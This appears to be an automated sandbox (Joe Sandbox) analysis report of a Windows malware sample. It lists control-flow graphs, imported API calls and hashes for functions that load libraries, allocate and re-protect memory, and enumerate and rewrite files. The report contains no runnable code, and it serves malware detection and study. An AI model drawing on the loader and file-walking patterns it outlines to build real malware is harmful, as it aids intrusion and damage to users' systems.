                                    control_flow_graph 22 20e1030-20e1075 LoadLibraryW GetProcAddress call 20e1b30 25 20e107e-20e108f 22->25 26 20e1077-20e1079 22->26 28 20e10a3-20e10be call 20e1b30 25->28 29 20e1091-20e109e SetLastError 25->29 27 20e148d-20e1490 26->27 32 20e10c7-20e10dc 28->32 33 20e10c0-20e10c2 28->33 29->27 34 20e10de-20e10eb SetLastError 32->34 35 20e10f0-20e10fd 32->35 33->27 34->27 36 20e10ff-20e110c SetLastError 35->36 37 20e1111-20e111a 35->37 36->27 38 20e112e-20e114f 37->38 39 20e111c-20e1129 SetLastError 37->39 40 20e1163-20e116d 38->40 39->27 41 20e116f-20e1176 40->41 42 20e11a5-20e11d5 GetNativeSystemInfo call 20e18d0 * 2 40->42 43 20e1178-20e1184 41->43 44 20e1186-20e1192 41->44 53 20e11e9-20e120c call 20e1800 42->53 54 20e11d7-20e11e4 SetLastError 42->54 46 20e1195-20e119b 43->46 44->46 48 20e119d-20e11a0 46->48 49 20e11a3 46->49 48->49 49->40 56 20e120e-20e121f call 20e1800 53->56 57 20e123d-20e1255 GetProcessHeap RtlAllocateHeap 53->57 54->27 60 20e1222-20e122c 56->60 58 20e127b-20e1291 57->58 59 20e1257-20e1276 SetLastError 57->59 61 20e129c 58->61 62 20e1293-20e129a 58->62 59->27 60->57 63 20e122e-20e1238 SetLastError 60->63 65 20e12a3-20e1300 call 20e1b30 61->65 62->65 63->27 68 20e1307-20e1370 call 20e1800 call 20e1980 call 20e1b50 65->68 69 20e1302 65->69 78 20e1377-20e1388 68->78 79 20e1372 68->79 70 20e147f-20e148b call 20e16c0 69->70 70->27 80 20e138a-20e13a0 call 20e2090 78->80 81 20e13a2-20e13a5 78->81 79->70 83 20e13ac-20e13ba call 20e21a0 80->83 81->83 87 20e13bc 83->87 88 20e13c1-20e13c5 call 20e1e80 83->88 87->70 90 20e13ca-20e13cf 88->90 91 20e13d6-20e13e4 call 20e2010 90->91 92 20e13d1 90->92 95 20e13eb-20e13f4 91->95 96 20e13e6 91->96 92->70 97 20e13f6-20e13fd 95->97 98 20e1470-20e1473 95->98 96->70 100 20e13ff-20e145b GetPEB 97->100 101 20e145d-20e146b 97->101 99 20e147a-20e147d 98->99 99->27 102 20e146e 100->102 101->102 102->99
                                    APIs
                                    • LoadLibraryW.KERNEL32(020E4054,020E4040), ref: 020E1047
                                    • GetProcAddress.KERNEL32(00000000), ref: 020E104E
                                      • Part of subcall function 020E1B30: SetLastError.KERNEL32(0000000D,?,020E1070,?,00000040), ref: 020E1B3D
                                    • SetLastError.KERNEL32(000000C1), ref: 020E1096
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2389523241.00000000020E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 020E1000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_20e1000_ExeFile (356).jbxd
                                    Similarity
                                    • API ID: ErrorLast$AddressLibraryLoadProc
                                    • String ID:
                                    • API String ID: 1866314245-0
                                    • Opcode ID: 39a277d9abb3f7ada3974502ee139228ab0b7c7531012580cde144292d2959f7
                                    • Instruction ID: f17d650bd038c175acb5bcdb1fa688bcc818c9f7d3f8fc57d77390fc6a418cac
                                    • Opcode Fuzzy Hash: 39a277d9abb3f7ada3974502ee139228ab0b7c7531012580cde144292d2959f7
                                    • Instruction Fuzzy Hash: D4F1E6B4E01209EFDF04DF94D990BAEB7B1BF48304F108599E91AAB341D774AE91DB90
                                    Function 00607D60 Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 219fileCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 107 607d60-607e2a 108 607e32-607e37 107->108 109 607e40-607e45 108->109 110 607fa8-607fad 109->110 111 607e4b 109->111 112 608052-608095 call 60b400 110->112 113 607fb3-607fb8 110->113 114 607e51-607e56 111->114 115 60809a-6080a1 111->115 112->109 119 607fe3-60801a 113->119 120 607fba-607fbf 113->120 121 607efc-607f10 call 603480 114->121 122 607e5c-607e61 114->122 117 6080a3-6080b9 call 603e40 call 603da0 115->117 118 6080be 115->118 117->118 133 6080c1-6080cd 118->133 124 608037-60804d SetFileInformationByHandle 119->124 125 60801c-608032 call 603e40 call 603da0 119->125 128 607fc1-607fc6 120->128 129 607fcb-607fd0 120->129 140 607f30-607f53 121->140 141 607f12-607f2a call 603e40 call 603da0 121->141 130 607ea0-607ea8 122->130 131 607e63-607e68 122->131 124->109 125->124 128->109 129->109 139 607fd6-607fe2 129->139 135 607ec8-607eec CreateFileW 130->135 136 607eaa-607ec2 call 603e40 call 603da0 130->136 131->129 138 607e6e-607e75 131->138 135->133 144 607ef2-607ef7 135->144 136->135 146 607e92-607e9e 138->146 147 607e77-607e8d call 603e40 call 603da0 138->147 161 607f70-607f7b 140->161 162 607f55-607f6b call 603e40 call 603da0 140->162 141->140 144->109 146->109 147->146 169 607f98-607fa3 161->169 170 607f7d-607f93 call 603e40 call 603da0 161->170 162->161 169->108 170->169
                                    APIs
                                    • CreateFileW.KERNELBASE(?,?,?,00000000,000A8C00,0100754F,00000000,000A8C00,?,00989680,?,?,00000000), ref: 00607EE5
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2389373625.0000000000601000.00000020.00001000.00020000.00000000.sdmp, Offset: 00600000, based on PE: true
                                    • Associated: 00000000.00000002.2389358921.0000000000600000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000000.00000002.2389388203.000000000060D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_600000_ExeFile (356).jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CreateFile
                                    • String ID: DR$Ou$fX
                                    • API String ID: 823142352-261343277
                                    • Opcode ID: da14d96349d19b6851c801be004725f8cae35dac4bd273fa2ec22d1666f6cf57
                                    • Instruction ID: cf4d2cd10a7e5777cdc9f6ff615d9bbabe42395041f4383e72fa27b7b2e49c30
                                    • Opcode Fuzzy Hash: da14d96349d19b6851c801be004725f8cae35dac4bd273fa2ec22d1666f6cf57
                                    • Instruction Fuzzy Hash: 1B817C71A883018FD758DF68D84562FB6E6AB88744F000D6DF186D73D0DB74DE098B96
                                    Function 006038B0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 189fileCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 178 6038b0-6038cb 179 6038d0-6038d5 178->179 180 603a85-603a8a 179->180 181 6038db 179->181 184 603af1-603af8 180->184 185 603a8c-603a91 180->185 182 6038e1-6038e6 181->182 183 603a7b-603a80 181->183 188 603b30-603b37 182->188 189 6038ec-6038f1 182->189 183->179 190 603b15-603b2b FindNextFileW 184->190 191 603afa-603b10 call 603e40 call 603da0 184->191 186 603a93-603a9a 185->186 187 603adb-603ae0 185->187 192 603ab7-603acb FindFirstFileW 186->192 193 603a9c-603ab2 call 603e40 call 603da0 186->193 187->179 198 603ae6-603af0 187->198 194 603b54-603b55 FindClose 188->194 195 603b39-603b4f call 603e40 call 603da0 188->195 196 6039d7-6039ea call 603480 189->196 197 6038f7-6038fc 189->197 190->179 191->190 203 603ad1-603ad6 192->203 204 603b57-603b61 192->204 193->192 194->204 195->194 215 603a07-603a22 196->215 216 6039ec-603a02 call 603e40 call 603da0 196->216 197->187 205 603902-603907 197->205 203->179 210 6039b1-6039d2 205->210 211 60390d-603913 205->211 210->179 217 603934-603936 211->217 218 603915-60391d 211->218 233 603a24-603a3a call 603e40 call 603da0 215->233 234 603a3f-603a4a 215->234 216->215 220 603938-60394b call 603480 217->220 221 60392d-603932 217->221 218->221 226 60391f-603923 218->226 235 603968-603998 call 6038b0 220->235 236 60394d-603963 call 603e40 call 603da0 220->236 221->179 226->217 230 603925-60392b 226->230 230->217 230->221 233->234 244 603a67-603a76 234->244 245 603a4c-603a62 call 603e40 call 603da0 234->245 254 60399d-6039ac call 603420 235->254 236->235 244->179 245->244 254->179
                                    APIs
                                    • FindFirstFileW.KERNELBASE(?,?,?,33A6B453,00000001,00000000), ref: 00603AC4
                                    • FindNextFileW.KERNELBASE(?,?,?,33A6B453,00000001,00000000), ref: 00603B1B
                                    • FindClose.KERNELBASE(?), ref: 00603B55
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2389373625.0000000000601000.00000020.00001000.00020000.00000000.sdmp, Offset: 00600000, based on PE: true
                                    • Associated: 00000000.00000002.2389358921.0000000000600000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000000.00000002.2389388203.000000000060D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_600000_ExeFile (356).jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Find$File$CloseFirstNext
                                    • String ID: *LO$.
                                    • API String ID: 3541575487-2132576683
                                    • Opcode ID: 80a8e87440a71c8faddf5f166f25a53e367335088e3ee787c88985164d4632d1
                                    • Instruction ID: 8e19d6d1825a302b1f5f7b591363b7fbf3ebf5ae825d501c8c35216daee89620
                                    • Opcode Fuzzy Hash: 80a8e87440a71c8faddf5f166f25a53e367335088e3ee787c88985164d4632d1
                                    • Instruction Fuzzy Hash: F35103B17D422047CB6CABB49840ABB73AF9F94741F40892EF546C73C1EA75CE058752
                                    Function 006080D0 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 169fileCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 259 6080d0-60819c 260 6081a1-6081a7 259->260 261 6081ad 260->261 262 60826e-608274 260->262 263 6081b3-6081b9 261->263 264 608264-608269 261->264 265 608300-608307 262->265 266 60827a-608280 262->266 269 60833c-608384 call 60b400 263->269 270 6081bf-6081c5 263->270 264->260 267 608324-608337 265->267 268 608309-60831f call 603e40 call 603da0 265->268 271 608282-608289 266->271 272 6082e9-6082ef 266->272 267->260 268->267 279 6082f5-6082ff 269->279 293 60838a 269->293 274 6081c7-6081cd 270->274 275 60822f-608236 270->275 277 6082a6-6082c9 271->277 278 60828b-6082a1 call 603e40 call 603da0 271->278 272->260 272->279 274->272 285 6081d3-6081db 274->285 282 608253-60825f 275->282 283 608238-60824e call 603e40 call 603da0 275->283 298 6082e6 277->298 299 6082cb-6082e1 call 603e40 call 603da0 277->299 278->277 282->260 283->282 291 6081fb-60821f CreateFileW 285->291 292 6081dd-6081f5 call 603e40 call 603da0 285->292 291->279 294 608225-60822a 291->294 292->291 302 608394-6083a1 293->302 303 60838c-60838e 293->303 294->260 298->272 299->298 303->279 303->302
                                    APIs
                                    • CreateFileW.KERNELBASE(?,?,?,00000000,?,0100754F,00000000), ref: 00608218
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2389373625.0000000000601000.00000020.00001000.00020000.00000000.sdmp, Offset: 00600000, based on PE: true
                                    • Associated: 00000000.00000002.2389358921.0000000000600000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000000.00000002.2389388203.000000000060D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_600000_ExeFile (356).jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CreateFile
                                    • String ID: DR$Ou$m
                                    • API String ID: 823142352-902897619
                                    • Opcode ID: 3451f2d64c8d5ca0aa1f3872c7c9ed46e77a21262abb2292114655e30d729447
                                    • Instruction ID: 92bf6bd18c4d93a77e4ac20b0ba7b06ef9e64f08660f5b12f21b1c78cbaa83c9
                                    • Opcode Fuzzy Hash: 3451f2d64c8d5ca0aa1f3872c7c9ed46e77a21262abb2292114655e30d729447
                                    • Instruction Fuzzy Hash: 8B61AB32A887019FD758DF68C845A6FB6E6ABD4714F00891DF4D5972D0DBB8CA098B82
                                    Function 00604F50 Relevance: 1.7, APIs: 1, Instructions: 249memoryCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 644 604f50-604f67 645 604f6c 644->645 646 604f70-604f76 645->646 647 60518a-605190 646->647 648 604f7c 646->648 649 605196 647->649 650 60526e-605274 647->650 651 605120-605127 648->651 652 604f82-604f88 648->652 657 605264-605269 649->657 658 60519c-6051a2 649->658 653 605283-60528a 650->653 654 605276-60527c 650->654 655 605144-60514f 651->655 656 605129-60513f call 603e40 call 603da0 651->656 659 60507e-605084 652->659 660 604f8e 652->660 665 6052a7-6052b2 653->665 666 60528c-6052a2 call 603e40 call 603da0 653->666 663 6052d5-6052dc 654->663 664 60527e 654->664 685 605151-605167 call 603e40 call 603da0 655->685 686 60516c-60517a 655->686 656->655 657->646 668 6051d0-6051d7 658->668 669 6051a4-6051aa 658->669 661 605086-60508c 659->661 662 6050aa-6050b1 659->662 670 605022-605029 660->670 671 604f94-604f9a 660->671 661->654 679 605092-6050a5 661->679 680 6050b3-6050c9 call 603e40 call 603da0 662->680 681 6050ce-6050f8 662->681 664->645 704 6052b4-6052ca call 603e40 call 603da0 665->704 705 6052cf-6052d3 RtlFreeHeap 665->705 666->665 675 6051f4-605216 668->675 676 6051d9-6051ef call 603e40 call 603da0 668->676 669->654 684 6051b0-6051cb call 6041c0 669->684 677 605046-605051 670->677 678 60502b-605041 call 603e40 call 603da0 670->678 673 604fdc-604fe3 671->673 674 604f9c-604fa2 671->674 690 605000-60501d 673->690 691 604fe5-604ffb call 603e40 call 603da0 673->691 674->654 687 604fa8-604faf 674->687 724 604fd5-604fda 675->724 725 60521c-605223 675->725 676->675 726 605053-605069 call 603e40 call 603da0 677->726 727 60506e-605079 677->727 678->677 679->646 680->681 718 605115-60511b 681->718 719 6050fa-605110 call 603e40 call 603da0 681->719 684->645 685->686 686->663 730 605180-605185 686->730 698 604fb1-604fc7 call 603e40 call 603da0 687->698 699 604fcc-604fcf 687->699 690->645 691->690 698->699 699->724 704->705 705->663 718->654 719->718 724->645 737 605240-60525f 725->737 738 605225-60523b call 603e40 call 603da0 725->738 726->727 727->645 730->645 737->646 738->737
                                    APIs
                                    • RtlFreeHeap.NTDLL(00000000,00000000,00000000,?,?,006087E4,?,33A6B453,?,?), ref: 006052D3
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2389373625.0000000000601000.00000020.00001000.00020000.00000000.sdmp, Offset: 00600000, based on PE: true
                                    • Associated: 00000000.00000002.2389358921.0000000000600000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000000.00000002.2389388203.000000000060D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_600000_ExeFile (356).jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: FreeHeap
                                    • String ID:
                                    • API String ID: 3298025750-0
                                    • Opcode ID: ed563b744e4d8014fd8e7e7edc3d69609ece648e70fd0af299ce935feb4aab63
                                    • Instruction ID: d8adbde747c537bf41f70329ac6cd5b7af13e3166ec27173499bd5c4fee88958
                                    • Opcode Fuzzy Hash: ed563b744e4d8014fd8e7e7edc3d69609ece648e70fd0af299ce935feb4aab63
                                    • Instruction Fuzzy Hash: 1381E431BC07115BDB6CABB88C91B6B72DBAFC8740F444569F942DB3D0EE649E014B85
                                    Function 00603060 Relevance: 1.7, APIs: 1, Instructions: 166memoryCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 759 603060-603076 760 60307a-60307f 759->760 761 603080-603085 760->761 762 6031e1-6031e6 761->762 763 60308b 761->763 766 6031e8-6031ed 762->766 767 60325c-60326a call 603c80 762->767 764 603091-603096 763->764 765 603177-60317e 763->765 768 603164-603172 764->768 769 60309c-6030a1 764->769 770 603180-603196 call 603e40 call 603da0 765->770 771 60319b-6031a6 765->771 773 603222-60322a 766->773 774 6031ef-6031f4 766->774 767->760 768->761 775 6030a7-6030ac 769->775 776 60326f-603277 769->776 770->771 796 6031c3-6031d1 RtlAllocateHeap 771->796 797 6031a8-6031be call 603e40 call 603da0 771->797 781 60324a-603257 773->781 782 60322c-603244 call 603e40 call 603da0 773->782 779 6031f6-6031fa 774->779 780 60320a-60320f 774->780 775->780 783 6030b2-60315f 775->783 785 603297-6032b7 776->785 786 603279-603291 call 603e40 call 603da0 776->786 787 603200-603205 779->787 788 6032ba-6032c4 779->788 780->761 789 603215-60321f 780->789 781->760 782->781 783->760 785->788 786->785 787->761 796->788 801 6031d7-6031dc 796->801 797->796 801->760
                                    APIs
                                    • RtlAllocateHeap.NTDLL(00000000,00000008,00000220), ref: 006031CB
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2389373625.0000000000601000.00000020.00001000.00020000.00000000.sdmp, Offset: 00600000, based on PE: true
                                    • Associated: 00000000.00000002.2389358921.0000000000600000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000000.00000002.2389388203.000000000060D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_600000_ExeFile (356).jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AllocateHeap
                                    • String ID:
                                    • API String ID: 1279760036-0
                                    • Opcode ID: 1488313f0a26ee278cbc29c89f95d7d9b8eda96f28d87761a41d4e4dc368ce7e
                                    • Instruction ID: 2c4521386052b931224d0326918882fe73dffc1371b67ece1b80bb7f91f329a3
                                    • Opcode Fuzzy Hash: 1488313f0a26ee278cbc29c89f95d7d9b8eda96f28d87761a41d4e4dc368ce7e
                                    • Instruction Fuzzy Hash: 355191317843118BCB5CCF68949456FBBEAABD8341F10492EF456C7390DB30DA4A8792
                                    Function 00606D70 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 109libraryCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 314 606d70-606d77 315 606d80-606d85 314->315 316 606e14-606e19 315->316 317 606d8b 315->317 320 606eee-606ef3 316->320 321 606e1f 316->321 318 606dfb-606e0f call 606cd0 317->318 319 606d8d-606d92 317->319 318->315 327 606d94 319->327 328 606dde-606de3 319->328 322 606da8-606dad 320->322 323 606ef9-606f0a call 606cd0 320->323 324 606e21-606e26 321->324 325 606e56-606e69 call 603480 321->325 322->315 329 606daf-606db1 322->329 323->315 331 606e28-606e2d 324->331 332 606e3d-606e51 call 606cd0 324->332 349 606e86-606e99 LoadLibraryW 325->349 350 606e6b-606e81 call 603e40 call 603da0 325->350 336 606d96-606d9b 327->336 337 606dc8-606ddc call 606cd0 327->337 328->322 334 606de5-606df9 call 606cd0 328->334 331->322 339 606e33-606e38 331->339 332->315 334->315 344 606db2-606dc6 call 606cd0 336->344 345 606d9d-606da2 336->345 337->315 339->315 344->315 345->322 352 606f0f-606f1a 345->352 355 606eb6-606ec1 349->355 356 606e9b-606eb1 call 603e40 call 603da0 349->356 350->349 363 606ec3-606ed9 call 603e40 call 603da0 355->363 364 606ede-606ee9 355->364 356->355 363->364 364->315
                                    APIs
                                      • Part of subcall function 00606CD0: LoadLibraryW.KERNELBASE(00000000,?,33A6B453,00606F05,?,33A6B453,006068AC), ref: 00606D00
                                    • LoadLibraryW.KERNELBASE(00000000,?,33A6B453,006068AC), ref: 00606E87
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2389373625.0000000000601000.00000020.00001000.00020000.00000000.sdmp, Offset: 00600000, based on PE: true
                                    • Associated: 00000000.00000002.2389358921.0000000000600000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000000.00000002.2389388203.000000000060D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_600000_ExeFile (356).jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: LibraryLoad
                                    • String ID: ;g+$;g+
                                    • API String ID: 1029625771-3974242271
                                    • Opcode ID: 9c8f5dec82a1de69cfd0f136abc5ec1174ac9b431096b051c7f5a4147feb308e
                                    • Instruction ID: 1dbc1cda1655697f5720a6c4a39669cc77dceda6b1ef3a88049829ea097245cf
                                    • Opcode Fuzzy Hash: 9c8f5dec82a1de69cfd0f136abc5ec1174ac9b431096b051c7f5a4147feb308e
                                    • Instruction Fuzzy Hash: 6B319E207C82108BEAACAEBCC85567F25879F84300F24953AF646CB3E1DDB4CC665796
                                    Function 00605C20 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 372 605c20-605c2c call 6063f0 375 605c49-605c4d ExitProcess 372->375 376 605c2e-605c44 call 603e40 call 603da0 372->376 376->375
                                    APIs
                                    • ExitProcess.KERNEL32(00000000), ref: 00605C4B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2389373625.0000000000601000.00000020.00001000.00020000.00000000.sdmp, Offset: 00600000, based on PE: true
                                    • Associated: 00000000.00000002.2389358921.0000000000600000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000000.00000002.2389388203.000000000060D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_600000_ExeFile (356).jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExitProcess
                                    • String ID: ?*S
                                    • API String ID: 621844428-1645505001
                                    • Opcode ID: 6bd16969eaa2fb291e12ce254cbfbd6484383597f892bd3c5237904a7d567573
                                    • Instruction ID: 64e516508abb63fca7168fefd43063a4ece9639079de8a2e521ffc91939d9dd3
                                    • Opcode Fuzzy Hash: 6bd16969eaa2fb291e12ce254cbfbd6484383597f892bd3c5237904a7d567573
                                    • Instruction Fuzzy Hash: 3CD0C9207C161047E69C6BF5D812B2B6297ABA0701F40552E750ACF3C6DFA18D215754
                                    Function 005F002D Relevance: 4.9, APIs: 3, Instructions: 387memoryCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 381 5f002d-5f009e call 5f0456 * 6 394 5f00a7-5f00b0 381->394 395 5f00a0-5f00a2 381->395 394->395 397 5f00b2-5f00b6 394->397 396 5f044e-5f0455 395->396 397->395 398 5f00b8-5f00c2 397->398 399 5f00e4-5f0105 GetNativeSystemInfo 398->399 400 5f00c4-5f00c7 398->400 399->395 401 5f0107-5f012d VirtualAlloc 399->401 402 5f00c9-5f00cf 400->402 403 5f012f-5f0133 401->403 404 5f0162-5f016c 401->404 405 5f00d6 402->405 406 5f00d1-5f00d4 402->406 407 5f0135-5f0138 403->407 408 5f016e-5f0173 404->408 409 5f01a4-5f01b5 404->409 410 5f00d9-5f00e2 405->410 406->410 413 5f013a-5f0142 407->413 414 5f0153-5f0155 407->414 415 5f0177-5f018a 408->415 411 5f01b7-5f01d1 409->411 412 5f0234-5f0240 409->412 410->399 410->402 434 5f01d3 411->434 435 5f0222-5f022e 411->435 416 5f0246-5f025d 412->416 417 5f02f0-5f02fa 412->417 413->414 418 5f0144-5f0147 413->418 419 5f0157-5f015c 414->419 420 5f018c-5f0193 415->420 421 5f0199-5f019e 415->421 416->417 425 5f0263-5f0273 416->425 422 5f03b2-5f03c7 call 20e27b0 417->422 423 5f0300-5f0307 417->423 427 5f014e-5f0151 418->427 428 5f0149-5f014c 418->428 419->407 429 5f015e 419->429 420->420 430 5f0195 420->430 421->415 424 5f01a0 421->424 456 5f03c9-5f03ce 422->456 431 5f0309-5f0312 423->431 424->409 432 5f02d5-5f02e6 425->432 433 5f0275-5f0279 425->433 427->419 428->414 428->427 429->404 430->421 436 5f0318-5f0333 431->436 437 5f03a7-5f03ac 431->437 432->425 441 5f02ec 432->441 438 5f027a-5f0289 433->438 439 5f01d7-5f01db 434->439 435->411 442 5f0230 435->442 443 5f034d-5f034f 436->443 444 5f0335-5f0337 436->444 437->422 437->431 445 5f028b-5f028f 438->445 446 5f0291-5f029a 438->446 447 5f01dd 439->447 448 5f01fb-5f0204 439->448 441->417 442->412 453 5f0368-5f036a 443->453 454 5f0351-5f0353 443->454 449 5f0339-5f033e 444->449 450 5f0340-5f0343 444->450 445->446 451 5f029c-5f02a1 445->451 452 5f02c3-5f02c7 446->452 447->448 455 5f01df-5f01f9 447->455 462 5f0207-5f021c 448->462 457 5f0345-5f034b 449->457 450->457 458 5f02b4-5f02b7 451->458 459 5f02a3-5f02b2 451->459 452->438 465 5f02c9-5f02d1 452->465 466 5f036c 453->466 467 5f0371-5f0376 453->467 460 5f0359-5f035b 454->460 461 5f0355-5f0357 454->461 455->462 463 5f044c 456->463 464 5f03d0-5f03d4 456->464 468 5f0379-5f0380 457->468 458->452 469 5f02b9-5f02bf 458->469 459->452 460->453 471 5f035d-5f035f 460->471 470 5f036e-5f036f 461->470 462->439 473 5f021e 462->473 463->396 464->463 472 5f03d6-5f03e0 464->472 465->432 466->470 467->468 474 5f0388-5f039d VirtualProtect 468->474 475 5f0382 468->475 469->452 470->468 471->468 476 5f0361-5f0366 471->476 472->463 477 5f03e2-5f03e6 472->477 473->435 474->395 478 5f03a3 474->478 475->474 476->468 477->463 479 5f03e8-5f03f9 477->479 478->437 479->463 480 5f03fb-5f0400 479->480 481 5f0402-5f040f 480->481 481->481 482 5f0411-5f0415 481->482 483 5f042d-5f0433 482->483 484 5f0417-5f0429 482->484 483->463 486 5f0435-5f044b 483->486 484->480 485 5f042b 484->485 485->463 486->463
                                    APIs
                                    • GetNativeSystemInfo.KERNELBASE(?,?,?,?,005F0005), ref: 005F00E9
                                    • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,005F0005), ref: 005F0111
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2389343212.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_5f0000_ExeFile (356).jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AllocInfoNativeSystemVirtual
                                    • String ID:
                                    • API String ID: 2032221330-0
                                    • Opcode ID: 460d81c489b0c162692d77f33f70033fe6d40d0b28a700ce4a73fb1871822586
                                    • Instruction ID: 3a1af6495b0b4405637906f6bca21c906e5cae1f0e7f00036f37807f567e713f
                                    • Opcode Fuzzy Hash: 460d81c489b0c162692d77f33f70033fe6d40d0b28a700ce4a73fb1871822586
                                    • Instruction Fuzzy Hash: 55D1C17560430A8FDB14CF19CC8477ABBE0FF84314F18592DEA858B282E778E845CB91
                                    Function 0041025B Relevance: 4.6, APIs: 3, Instructions: 58memoryCOMMONLIBRARYCODE
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 489 41025b-410267 490 410269-41026a 489->490 491 4102d8-4102ea call 412a79 call 411e2c 489->491 493 41026b-410272 490->493 507 4102ec-4102ee 491->507 494 410274-41028b call 412a13 call 412864 call 41257e 493->494 495 41028c-41028e 493->495 494->495 498 410290-410292 495->498 499 410294-410296 495->499 502 410297-4102aa RtlAllocateHeap 498->502 499->502 505 4102d2-4102d6 502->505 506 4102ac-4102b5 502->506 505->507 509 4102c4-4102c9 call 411e2c 506->509 510 4102b7-4102c0 call 412a79 506->510 517 4102cb-4102d0 call 411e2c 509->517 510->493 518 4102c2 510->518 517->505 518->517
                                    APIs
                                    • __FF_MSGBANNER.LIBCMT ref: 00410274
                                      • Part of subcall function 00412A13: __NMSG_WRITE.LIBCMT ref: 00412A3A
                                      • Part of subcall function 00412A13: __NMSG_WRITE.LIBCMT ref: 00412A44
                                    • __NMSG_WRITE.LIBCMT ref: 0041027B
                                      • Part of subcall function 00412864: GetModuleFileNameW.KERNEL32(00000000,0041F722,00000104,00000001,00000000,?), ref: 00412900
                                      • Part of subcall function 00412864: __invoke_watson.LIBCMT ref: 00412929
                                      • Part of subcall function 00412864: _wcslen.LIBCMT ref: 0041292F
                                      • Part of subcall function 00412864: _wcslen.LIBCMT ref: 0041293C
                                      • Part of subcall function 0041257E: ___crtCorExitProcess.LIBCMT ref: 00412586
                                      • Part of subcall function 0041257E: ExitProcess.KERNEL32 ref: 0041258F
                                      • Part of subcall function 00411E2C: __getptd_noexit.LIBCMT ref: 00411E2C
                                    • RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,00413CED,?,00000001,?,?,004147E0,00000018,0041BE58,0000000C,00414870), ref: 004102A0
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2389041717.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2389028731.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000000.00000002.2389059623.0000000000419000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000000.00000002.2389074372.000000000041D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000000.00000002.2389089341.0000000000422000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ExeFile (356).jbxd
                                    Similarity
                                    • API ID: ExitProcess_wcslen$AllocateFileHeapModuleName___crt__getptd_noexit__invoke_watson
                                    • String ID:
                                    • API String ID: 4285633346-0
                                    • Opcode ID: 85379f81ff0939ec83c584100c10549c30d19fa7ca46aaa6a850a0ef7457cf0a
                                    • Instruction ID: 7e8d332be424b32aeb7339ed39cdb599a77868d368d5d78e5393627917a903ca
                                    • Opcode Fuzzy Hash: 85379f81ff0939ec83c584100c10549c30d19fa7ca46aaa6a850a0ef7457cf0a
